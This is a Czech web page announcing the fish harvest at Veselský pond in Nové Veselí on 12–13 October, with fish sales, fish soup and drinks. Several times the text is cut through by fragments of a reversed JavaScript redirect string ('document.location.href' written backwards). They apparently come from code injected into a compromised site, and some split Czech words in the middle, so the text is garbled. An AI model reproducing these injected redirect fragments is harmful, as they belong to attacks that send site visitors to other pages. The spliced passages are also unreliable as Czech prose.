Rainbow page separator

Výlov Veselského rybníka

Pátek, 27. září 2019

 
[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor“>

Nové Veselí / Srdečně Vás zveme na tradiční výlov Veselského rybníka v Novém Veselí, který se uskuteční v sobotu 12.10., dolovek v neděli 12.-13.10. Veselský rybník je po Velkém Dářku o druhý největší rybník v našem Rybářském středisku Žďár, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se můžete těšit na velkolepou podívanou, boha[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou a pestrou nabídku ryb. 
Během výlovu bude probíhat prodej ryb – těch, co zrovna vylovíme. Čerstvější rybu si lze jen těžko představit. Prodej bude probíhat v sobotu od 8:30 do 16 hod, v neděli 8:30-12 hod
Když Vám během výlovu vyhládne, můžete si dopřát lahodnou rybí polévku pana Krejčího, nebo třeba smaženého kapra či další rybí speciality. Samozřejmostí je pro nás nabídka nápojů – pivo, limo, káva a další dobroty. 

Přijďte 12.-13.10. – bude [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to velkolepá podívaná!

Těšíme se na Vás!

Tým rybářů KINSKÝ Žďár

PS: Dejte nám na Facebooku vědět, že přijdete!